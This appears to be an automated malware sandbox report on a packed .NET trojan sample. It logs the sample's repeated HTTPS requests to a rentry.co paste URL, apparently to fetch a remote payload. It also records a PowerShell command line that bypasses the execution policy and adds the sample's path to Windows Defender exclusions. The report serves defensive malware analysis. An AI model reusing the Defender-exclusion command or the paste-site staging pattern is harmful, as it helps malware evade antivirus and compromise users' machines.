                                                                                        2024-10-18 10:44:31 UTC709INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:31 UTC1369INData Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
                                                                                        2024-10-18 10:44:31 UTC1369INData Raw: 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: o'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:31 UTC1013INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 66 66 34 66 35 65 65 38 34 62 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 33 4d 53 34 77 4d 44
                                                                                        Data Ascii: ootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eeff4f5ee84b',t:'MTcyOTI0ODI3MS4wMD
                                                                                        2024-10-18 10:44:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        93192.168.2.660758104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:32 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:33 UTC660INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:33 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01jMqV3lW1H4KghzbtIxu8Cmk%2BVJupY4zg%2FMC%2FmSLgg3c%2Fju8c1fgUg8YXHma23JGndNi4Do8nFxxuwddWQ0nsO8HKIIkOp0%2BUSH8kabeGSLIFcuyVctNtqCHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ef099fe1e7f3-DFW
                                                                                        2024-10-18 10:44:33 UTC709INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:33 UTC1369INData Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
                                                                                        2024-10-18 10:44:33 UTC1369INData Raw: 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: o'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:33 UTC1013INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 66 30 39 39 66 65 31 65 37 66 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 33 4d 79 34 77 4d 44
                                                                                        Data Ascii: ootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ef099fe1e7f3',t:'MTcyOTI0ODI3My4wMD
                                                                                        2024-10-18 10:44:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        94192.168.2.660759104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:33 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:34 UTC660INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:34 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nOaO8J%2F8K4eSL0it%2Fs5Ox3jNqwQhWvDSpl5jmb%2Fv17VVGEDQJDiOZ%2BLcooIKANDUAbcrzR4GRqxToNexgU%2FPd6p46fFe2eFTpRy6wWrBzsCG4AaBZdnsSAtE5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ef0fe9332ccc-DFW
                                                                                        2024-10-18 10:44:34 UTC709INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:34 UTC1369INData Raw: 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta
                                                                                        2024-10-18 10:44:34 UTC1369INData Raw: 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: o'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:34 UTC1012INData Raw: 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 66 30 66 65 39 33 33 32 63 63 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 33 4e 43 34 77 4d 44
                                                                                        Data Ascii: ootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ef0fe9332ccc',t:'MTcyOTI0ODI3NC4wMD
                                                                                        2024-10-18 10:44:34 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:44:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        95192.168.2.660760104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:35 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:35 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:35 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ADSXGFPqENSfOzgyaDi7szTDtulwFmHArXpQzx4HZc9jbFUkT%2BEakLD%2FHi0HkCt1LDOjtbHduUWE3xKMfuv0PUSy4duw%2F%2F2%2BBkSQRQNs%2BzDdxlzgEOTZN3Cgfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ef1a4fc5e987-DFW
                                                                                        2024-10-18 10:44:35 UTC707INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:35 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:44:35 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:35 UTC1015INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 66 31 61 34 66 63 35 65 39 38 37 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 33 4e 53 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ef1a4fc5e987',t:'MTcyOTI0ODI3NS4w
                                                                                        2024-10-18 10:44:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:06:41:17
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe"
                                                                                        Imagebase:0x700000
                                                                                        File size:135'376 bytes
                                                                                        MD5 hash:418F363765E0400FFA7E1FE93866DDEB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:06:41:19
                                                                                        Start date:18/10/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe'
                                                                                        Imagebase:0x910000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:06:41:19
                                                                                        Start date:18/10/2024
